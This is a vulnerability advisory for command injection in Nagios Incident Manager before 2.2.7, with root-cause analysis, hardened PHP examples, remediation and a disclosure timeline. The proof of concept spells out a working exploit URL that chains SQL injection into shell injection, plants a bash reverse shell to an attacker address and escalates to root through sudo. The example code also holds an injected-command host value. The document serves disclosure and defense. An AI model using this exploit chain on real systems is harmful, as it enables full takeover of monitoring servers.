Nagios Incident Manager < 2.2.7 Host Remote Code Execution

Summary

A Command Injection vulnerability in Nagios Incident Manager (component of Nagios XI) before 2.2.7 allows authenticated attackers to achieve remote code execution via a malicious host record.

Product Description (from vendor)

“Resolve network incidents, collaborate with team members, and track incident history”. For more information visit https://www.nagios.com/products/nagios-incident-manager/.

CVE(s)

Details

Root Cause Analysis

The Nagios XI component endpoint /nagiosxi/includes/components/nagiosim/nagiosim.php (on disk: nagiosxi/basedir/html/includes/components/nagiosim/nagiosim.php) is what lets Nagios XI interact with Nagios IM. The relevant code is:

<?php
// [1] $host comes from a database query whose result the attacker controls (see below)
[1] $cmd = get_core_comment($host, $service, $title, $status);
// [3] the assembled shell command line is executed as-is
[3] exec($cmd, $output);
    [...]
    function get_core_comment($host, $service, $title, $status)
    {
        [...]

        if ($service != '') {
            $ackCommand = 'ADD_SVC_COMMENT';
            // [2] $host (and every other field) is interpolated into a single-quoted
            //     /bin/echo argument; a value containing ' followed by ; escapes it
[2]         $cmdstring = "/bin/echo '[$now] $ackCommand;$host;$service;$persistent;$username;$message' > $pipe";
        }
        [...]

        return $cmdstring;
    }

At [1], $host is read from the result of the database query described in CVE-2019-9204 (the SQL injection in the same file). At [2], it is interpolated into a shell command string without sanitization or validation, and at [3] the assembled command is run with exec(). Because the value lands inside a single-quoted /bin/echo argument, a host name containing a single quote followed by a semicolon terminates the echo command and starts an attacker-controlled one, which the shell then executes.

An authenticated attacker can therefore achieve remote code execution by planting a malicious host record in a network incident.
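The following is an added example, not code from the advisory or from Nagios: the injectable pattern from the snippet above placed next to two hardened forms, one that never involves a shell and one that keeps exec() but escapes every argument. The function names, the command-file path and the allow-listed object-name charset are assumptions for illustration.

```php
<?php
// Added example for this advisory; not Nagios code. The pipe path, the
// helper names and the allowed object-name charset are assumptions.

// The injectable pattern from the advisory: $host (and every other field)
// is interpolated straight into a shell command line that is later passed
// to exec(). A host such as  '; id; #  terminates the quoted echo argument.
function build_comment_cmd_vulnerable(string $host, string $service, string $username, string $message, string $pipe): string
{
    $now = time();
    $ackCommand = 'ADD_SVC_COMMENT';
    $persistent = 1;
    return "/bin/echo '[$now] $ackCommand;$host;$service;$persistent;$username;$message' > $pipe";
}

// Hardened step 1: validate. Host and service names never legitimately
// contain ';' (the external-command field separator), quotes, whitespace
// or shell metacharacters, so allow-list a conservative charset instead
// of trying to escape. The regex is an assumption; widen it only if your
// object names need more characters.
function is_safe_object_name(string $value): bool
{
    return preg_match('/^[A-Za-z0-9._-]{1,255}$/', $value) === 1;
}

// Hardened step 2: do not involve a shell at all. The Nagios command file
// is a plain FIFO, so append the line with fwrite(). Newlines are stripped
// from free-text fields so one call cannot smuggle a second command, and
// ';' is stripped from the username so it cannot shift the field layout.
function write_core_comment(string $host, string $service, string $username, string $message, string $pipe): bool
{
    if (!is_safe_object_name($host) || !is_safe_object_name($service)) {
        return false;
    }
    $username = str_replace(["\r", "\n", ';'], '', $username);
    $message  = str_replace(["\r", "\n"], ' ', $message);
    $line = sprintf("[%d] ADD_SVC_COMMENT;%s;%s;1;%s;%s\n", time(), $host, $service, $username, $message);
    $fh = @fopen($pipe, 'a');
    if ($fh === false) {
        return false;
    }
    $ok = fwrite($fh, $line) !== false;
    fclose($fh);
    return $ok;
}

// Hardened fallback if exec() must stay: every interpolated value goes
// through escapeshellarg(), which wraps it in single quotes and escapes
// any embedded quote, so the attacker's closing quote never reaches sh.
function build_comment_cmd_escaped(string $host, string $service, string $username, string $message, string $pipe): string
{
    $line = sprintf('[%d] ADD_SVC_COMMENT;%s;%s;1;%s;%s', time(), $host, $service, $username, $message);
    return '/bin/echo ' . escapeshellarg($line) . ' > ' . escapeshellarg($pipe);
}

// Constructed input that mirrors the shape of the advisory's payload.
$evilHost = "'; id > /tmp/pwned; #";
$pipe = '/usr/local/nagios/var/rw/nagios.cmd';   // assumed command-file path
echo "vulnerable: ", build_comment_cmd_vulnerable($evilHost, 'PING', 'nagiosadmin', 'ack', $pipe), "\n";
echo "escaped:    ", build_comment_cmd_escaped($evilHost, 'PING', 'nagiosadmin', 'ack', $pipe), "\n";
echo "validated:  ", var_export(is_safe_object_name($evilHost), true),
     " / ", var_export(is_safe_object_name('web-01.example'), true), "\n";
```

Running it prints the vulnerable command line with the attacker's `'; id > /tmp/pwned; #` sitting outside the quotes, the escaped variant with the whole external-command line wrapped in one safe argument, and false/true for the two validation calls. Of the two hardened forms, prefer write_core_comment(): the only reason the original code shells out is to redirect echo into the command file, and fwrite() does that without giving user data a path to /bin/sh.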

Proof of Concept

Note: this PoC also chains CVE-2019-9204, CVE-2019-9166 and CVE-2019-9203 to turn the injection into root-level remote code execution.

  1. Log in to Nagios XI.
  2. Start a TCP listener on a local port (the URL below uses 10.13.37.42:8080; substitute your own address and port).
  3. Using the logged-in session, edit the listener address/port in the following URL and navigate to it: [host]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=1'UNION%20select%201,2,3,4,"';echo%20'print(\"bash+-i+>%26+/dev/tcp/10.13.37.42/8080+0>%261+%23\")%3b'>>+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x
  4. A root shell connects back to the listener.

The UNION SELECT is the SQL injection (CVE-2019-9204) that supplies the attacker-controlled value that reaches $host. That value opens with a single quote and a semicolon, closing the quoted /bin/echo argument; the commands that follow append a reverse-shell line to /usr/local/nagiosxi/html/config.inc.php and then run /usr/local/nagiosxi/scripts/repair_databases.sh through sudo, which is the root step of the chain. The trailing # comments out the remainder of the original echo command.

Impact

An authenticated attacker can take control of Nagios XI.

Remediation

Upgrade to Nagios IM 2.2.7 or later. (Note: we didn’t verify the patch.)

Disclosure Timeline

This report was subject to Shielder’s disclosure policy:

  • 25/02/2019:
    • Vulnerability report is sent to vendor
    • Vendor acknowledges issue and releases Nagios IM 2.2.7
  • 10/04/2019: Shielder’s advisory is made public

Credits

`polict` of Shielder

This advisory was first published on https://www.shielder.com/advisories/nagiosim-host-remote-code-execution/

Date

10 April 2019